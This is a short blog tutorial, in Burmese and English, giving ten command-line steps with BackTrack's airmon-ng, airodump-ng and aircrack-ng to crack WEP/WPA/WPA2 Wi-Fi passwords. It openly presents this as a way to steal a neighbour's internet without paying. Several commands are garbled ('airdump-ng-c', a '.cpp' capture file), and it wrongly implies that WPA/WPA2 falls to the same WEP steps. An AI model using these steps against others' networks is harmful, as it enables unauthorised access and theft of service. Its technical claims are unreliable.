Popular

Template Information

Welcome To Sora Films

Hack Wi-Fi Hotspot Password Using Linux Backtrack

 
Wi-Fi Hotspot ရဲ႕ Passwords ကို Hack ခ်င္သူမ်ားအတြက္လာပါၿပီ WEP/WPA/WPA2 ေတြကို
BackTrack နဲ႕ Hack လုပ္မွာပါ..ဒီေတာ့ ဘယ္လိုလုပ္မလဲဆိုတာ ဘာသာမျပန္ေတာ့ဘူးေနာ္

လိုအပ္ခ်က္ေတြကေတာ့ BT5 Boot တက္ဖို႕အတြက္ http://www.harrisnyi.tk/2013/05/virtual-box-iso-file-windows-ebook.html ကိုဖတ္ပါ..

ေနာက္တစ္ခုက မိမိမွာ Wireless ဖမ္းတဲ့ ကဒ္အပို ဥပမာ TP-Link လိုပါမယ္။

This tutorial will show you how to easily Hack, Bypass or Creak anyWEP/WPA/WPA2 Wi-Fi hotspot password using Linux Backtrack program and It will take you only 10 very easy steps to follow and you are done.

Using Linux backtrack you can easily hack or steal your neighbor Wi-Fi internet password and use his/her internet connection without paying any internet bill.

Now Follow This Steps:

Step 1: Run VMware and open Backtrack iso.

Step 2: Open Shell Consol after start Backtrack.

Step 3: Type airmon-ng and hit enter. It will show you interface, chipset, driver, etc.

Step 4: Type airodump-ng wlan0 and hit enter. Wait a while when it is searching for available connections.

Step 5: You can see a list. Chose a hotspot name you want to hack.

Step 6: Copy the ch value of your selected connection. Then type airdump-ng-c and past ch value just after this. Next to the ch value type –bssid space your bssid number and -w wep_hack wlan0 and press enter.

(Example:  airdump-ng-c ch value –bssid 00:1F:9F:73:C0:45 -w wep_hack wlan0)

Step 7: Wait and do not close the window.

Step 8: If this window has finished then open a new shell console and type dir and hit enter.

Step 9: Type aircrack-ng -a 1 –b and your bssid.

(example: aircrack-ng -a 1 -b 00:1F:9F:73:C0:45 wep_hack-01.cpp)

Step 10: If you have seen this text decrypted correctly 100%, it means you have successfully done this process.

Now you can see you desired Wi-Fi password just above this massage.

Share This: